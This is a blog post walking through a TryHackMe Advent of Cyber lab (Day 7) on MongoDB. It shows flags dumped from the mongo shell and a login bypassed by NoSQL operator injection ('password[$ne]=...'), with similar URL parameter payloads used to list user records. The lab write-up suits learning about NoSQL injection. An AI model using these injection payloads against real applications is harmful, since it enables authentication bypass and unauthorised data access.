AoC3#07: Migration Without Security

We’re now on the last web exploitation task for the advent of cyber challenge, Day 7, Migration Without Security. So far I’ve written up:

  • Days 1-5 which were a walk in the park. Very basic web exploitation stuff.
  • Day 6, noticeable harder and a lot more fun. This daily challenge implemented local file inclusion (LFI), remote code execution (RCE) and log poisoning

Day 7 Migration Without Security

This challenge focuses heavily on MongoDB server, a NoSQL DBMS I don’t have a massive amount of knowledge of. Thankfully the concepts and theory of SQL injection copy across to all DBMS, afaik.

We’re told up in the story to ssh in with thm:tryhackme, which I glossed over and got royally confused. Anyway, once you’re SSH’d into the box, access Mongo DB using mongo.

Then simply dumping out the collection gives up the first flag.

> show databases
admin   0.000GB
config  0.000GB
flagdb  0.000GB
local   0.000GB

> use flagdb
switched to db flagdb

> show collections
flagColl

> db.flagColl.find()
{ "_id" : ObjectId("618806af0a...bdf42bd6a"), "flag" : "THM{8814a5e...9d944f9}" }

> 

I then opened up the webpage and dump in some junk credentials. Needless to say they failed but I grabbed the request from the browser and copied it out, in curl format.

curl 'http://10.10.79.253/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.79.253' -H 'Connection: keep-alive' -H 'Referer: http://10.10.79.253/login' -H 'Cookie: connect.sid=s%3ACft6JjQFYCfFomIvvfP-meNcqCWB8sgo.KQios7SDLz%2FL7w6nQGdeiK%2FEFu0Eyg7pi%2FT4aJIj%2FtU' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'username=user1&password=pass1'

I then changed the final part of the request to read:

 --data-raw 'username=admin&password[$ne]=pass1'

And I got a direction message back from the server. It worked!

As my browser has the same session cookie value, I then went to the homepage again and got redirected back to logged in dashboard page.

I then clicked the link to grab the 1st flag for this challenge.

I then used a similar method to dump out the usernames with the role of guest. The URL variables can be easily manipulated in the browser, to something like:

/search?username[$ne]=admin&role=guest

A similar modification gives up the third flag too:

/search?username[$ne]=junk&role[$ne]=junk

Scroll down through (presumably) all the username records. McSkidy is buried in that list somewhere.

That completes Day 7 – relatively easy to be honest – but an important SQLi premise for a DB I know little about.

The writeup for Day 8 is now done – showing a whole day of PowerShell log analysis on a compromised Window’s box

Leave a Reply

Your email address will not be published. Required fields are marked *